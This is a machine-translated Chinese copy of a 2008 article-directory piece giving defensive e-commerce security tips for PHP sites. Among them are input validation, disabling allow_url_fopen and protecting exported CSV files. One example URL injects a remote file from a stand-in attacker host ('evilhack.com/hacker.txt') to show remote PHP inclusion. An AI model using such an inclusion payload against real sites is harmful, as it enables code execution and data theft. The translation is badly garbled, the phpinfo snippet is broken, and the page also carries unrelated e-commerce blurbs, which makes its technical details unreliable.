The following content has been automatically translated by close 
电子商务安全-堵塞安全漏洞|阿电子商务文章
第球形徽标

电子商务安全-堵塞安全漏洞

由专家作者: 保罗罗伯茨 | 文章摘要
字数:520字|点击:159期(县)
在一个电子商务网站需要有一个重要的考虑因素时,开发一个安全电子商务网站或软件。开发人员必须对所有的安全网站设计时注意事项。随着电子商务的日益普及,这些天,安全攻击数量肯定增加。偏执狂是一个电子健康的事情,电子商务网站开发人员,我们必须保持与安全问题的大门,并保持我们的耳朵和眼睛打开。虽然以下漏洞严重的,如果存在以下漏洞很容易修复。

下面列出了一些安全方面的考虑应包括在开发一个网站。本文不包括电子买,请参阅我在这个单独的条文。

用户输入-每个输入,无论是进入了数量,产品搜索,输入一个名称等,必须对可疑人物进行验证。如果不这样做,它有可能进入"?>",结束的PHP结束标记和执行一些PHP代码。

这是更加安全,让数字和字符宰(包括资金)和0-9,没有别的,而不是使所有的字符不应该存在的清单。验证脚本需要通过每一个字,一个字一个滚动。这需要实现服务器端验证使用,与JavaScript。使用服务器端的输入验证是必需的不需要的字符

另一个主要存在在执行PHP代码。当使用PHP有一个叫做allow_url_fopen选项设置使从PHP脚本文件的开放。此设置应关闭,除非绝对必要的。

试想你有固定的页眉和页脚PHP脚本,并访问您的网页你会在http://www.mysite.com/index.php?page=page2类型。它采取的所有是一个恶意用户通过修改运行中输入“这些参数的脚本http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt”与一些文件中的PHP代码“hacker.txt”。你可以有任何事情发生,PHP文件阅读,删除,重要信息被盗。

如果您不知道此设置或关闭,请复制到一个文本文件下面的PHP代码,并将其上传到您的Web服务器:

phpinfo()函数;
?“

当您访问您的网络服务器上的脚本,你应该遇到设立allow_url_fopen选项下的配置。

计算机用户,一般情况下无法找到该设置值。

要小心的出口数据如订单,产品在CSV和MySQL文件。如果这些数据是从脚本导出并在Web服务器上保存在一个共同文件的名称,即。 http://www.mysite.com/admin/output_tables.csv。这仅仅是一个真正的问题时,导出的数据,在文件所在的目录是公开访问的。有两种方法来防止这种安全漏洞-首先有密码保护的背后输出文件的目录,其次有内部的HTML textarea的剧本上的表单元素里的数据。该店主可以复制此信息的文本文件,并创建一个在他们的计算机和信息粘贴在这里新的文件。

只需要一黑客通过检查发现了电子商务软件的演示网站,并寻找一个真正的网站使用的文件名相同的文件名。
保罗罗伯茨

关于作者/作者自述

保罗罗伯茨
我开了一家软件开发公司在首页专门电子商务,搜索引擎优化,软件和打印估计所谓的机器人设计解决方案。我也发展的名义下机器人设计新西兰电子商务解决方案和软件

Article Source: http://www.zh-cn.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Submitted: 2008-06-05 | This Article has been viewed 159 times.

Rate Article

Related Videos

How to Strengthen Network Security with Cisco Network Manager
Understanding your Home Network Router #5 - Secure Your Network with WPA2
如何让您的电脑安全
如何检查Windows Vista中的安全设置

更多“电子商务”相关文章

下面列出的是更多的是从“电子商务”类物品上述文章中的文章。

在上述文章中有关“电子商务安全-堵塞安全漏洞,”人们也有兴趣在下列有关条款:

运行电子商务业务不仅可以确保您的网站建立和运行。客户依赖你的能力,为通过电话,传真,电子邮件或其他方法来,它需要的所有系统将努力能够完成客户的要求。
短短数天内返回的情侣,我有一个朋友聊天。他是庆祝他的孩子的第一生日,并执行他在喀拉拉邦之间和钦奈,他的工作地点人。他和他的贤内助前往这些地方之间的至少4次上一个月。
如果你一直在做的任何时间,电子商务,你就会知道有比批发运输船目录服务的真正的供应商提供更多scamers。在电子商务的,Salehoo和全球品牌是信誉良好的服务,都取得了在过去几年流行提供商。
如果你曾经一直是在线零售商,你可能已经听说过Salehoo,甚至用它来你的优势。如果您刚刚开始您的业务时,你可能与混合Salehoo混乱评语那里。现在,让我们来看看什么Salehoo的真正意义,以及它们提供的服务,很多往往忽略外观。
有多少人,你知道网上购买东西?如果你像我一样不少,这就是为什么电子商务是世界上新的网上购物商场。但是,谁运行这些网上零售商店?就像你和我这样的人,这就是为什么这一业务正在蓬勃发展,将继续繁荣,现在和未来。
如果你是一个最新的电子产品巨大的风扇,你可能被引诱由经营自己的电子网上业务的想法。这并不困难,开始时采取正确的电子服务下降航运充分利用有很多供您选择。
你有没有进入当地的便利店,不知道会是这样,如果你拥有它?你会是一个很好的人,会喜欢你的人呢?那么这篇文章将显示您拥有自己的网上零售商店的好处, 或一般称为电子贸易,从本地实际便利店不同。
文章目录主页 所有类别 互联网和电子商务 电子商务

找不到您要的资料吗?试用谷歌搜索!
版权所有© 2005 - 由Larry林,新加坡-文章搜索引擎目录上ArticleSphere.com™
全球版权所有。所有商标和服务标志是其各自所有者的财产。

南非荷兰文 阿尔巴尼亚文 阿拉伯语 白俄罗斯文 保加利亚文 加泰罗尼亚文 中文(简体) 中文(繁体) 克罗地亚文 捷克文 丹麦文 德语 英语 爱沙尼亚文 菲律宾文 芬兰文 法语 加利西亚文 希腊语 希伯来语 印地文 匈牙利文 冰岛文 印度尼西亚文 爱尔兰文 意大利语 日语 韩文 拉脱维亚文 立陶宛文 马其顿文 马来文 马耳他文 荷兰文 挪威文 波斯文 波兰文 葡萄牙语 罗马尼亚文 俄文 塞尔维亚文 斯洛伐克文 斯洛文尼亚文 西班牙语 斯瓦希里文 瑞典文 泰国 土耳其文 乌克兰文 越南文 威尔士文 依地文